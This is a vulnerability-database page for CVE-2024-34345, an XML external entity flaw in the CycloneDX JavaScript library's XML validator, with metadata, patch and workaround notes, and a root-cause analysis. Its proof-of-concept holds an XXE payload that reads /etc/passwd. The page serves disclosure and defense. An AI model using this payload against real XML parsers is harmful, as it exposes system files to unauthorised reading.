8.1

CVSS Score

3.1

-

CVSS Score

Basic Information

CVE ID

CVE-2024-34345

GHSA ID

GHSA-38gf-rh2w-gmj7

EPSS Score

0.18538%

CWE

CWE-611

Published

5/8/2024

Updated

5/14/2024

KEV Status

Technology

JavaScript

Basic Information

CVE ID

GHSA ID

EPSS Score

CWE

Published

Updated

KEV Status

Technology

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

CVE-2024-34345

CVE-2024-34345: @cyclonedx/cyclonedx-library Improper Restriction of XML External Entity Reference vulnerability

Impact

XML External entity injections could be possible, when running the provided XML Validator on arbitrary input.

POC

const {
  Spec: { Version },
  Validation: { XmlValidator }
} = require('@cyclonedx/cyclonedx-library');

const version = Version.v1dot5;
const validator = new XmlValidator(version);
const input = `<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE poc [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<bom xmlns="http://cyclonedx.org/schema/bom/1.5">
  <components>
    <component type="library">
      <name>testing</name>
      <version>1.337</version>
      <licenses>
        <license>
          <id>&xxe;</id><!-- << XML external entity (XXE) injection -->
        </license>
      </licenses>
    </component>
  </components>
</bom>`;

// validating this forged(^) input might lead to unintended behaviour
// for the fact that the XML external entity would be taken into account.
validator.validate(input).then(ve => {
  console.error('validation error', ve);
});

Patches

This issue was fixed in @cyclonedx/cyclonedx-library@6.7.1 .

Workarounds

Do not run the provided XML validator on untrusted inputs.

References

issue was introduced via https://github.com/CycloneDX/cyclonedx-javascript-library/pull/1063.

(GitHub Advisory)

Miggo Vulnerability Database

→

CVE-2024-34345

CVE-2024-34345:

8.1

CVSS Score

3.1

-

CVSS Score

Basic Information

CVE ID

CVE-2024-34345

GHSA ID

GHSA-38gf-rh2w-gmj7

EPSS Score

0.18538%

CWE

CWE-611

Published

5/8/2024

Updated

5/14/2024

KEV Status

Technology

JavaScript

Basic Information

CVE ID

GHSA ID

EPSS Score

CWE

Published

Updated

KEV Status

Technology

Technical Details

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
@cyclonedx/cyclonedx-library	npm	= 6.7.0	6.7.1

Technical Details

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The vulnerability stems from the XML parser configuration in XmlValidator. The commit diff shows the vulnerable version (6.7.0) had 'noent: true' in xmlParseOptions, which explicitly enables entity substitution. This setting is dangerous when processing untrusted XML, as it permits XXE attacks. The patch reverted this configuration by removing 'noent: true', confirming this was the root cause. The validate method in XmlValidator.node.ts executes parsing with these insecure options, making it the vulnerable entry point.

Vulnerable functions

Only Mi**o us*rs **n s** t*is s**tion

WAF Protection Rules

WAF Rule

W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.

Reasoning

*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.

8.1

-

Basic Information

Basic Information

Concerned about an active attack path?

CVE-2024-34345: @cyclonedx/cyclonedx-library Improper Restriction of XML External Entity Reference vulnerability

Impact

POC

Patches

Workarounds

References

CVE-2024-34345:

8.1

-

Basic Information

Basic Information

Technical Details

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

Vulnerability IntelligenceMiggo AI

CVE-2024-34345: @cyclonedx/cyclonedx-library Improper Restriction of XML External Entity Reference vulnerability

Impact

POC

Patches

Workarounds

References

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

Basic Information

Basic Information

8.1

8.1

Technical Details

Vulnerability Intelligence
Miggo AI

Vulnerability Intelligence
Miggo AI

Vulnerability Intelligence
Miggo AI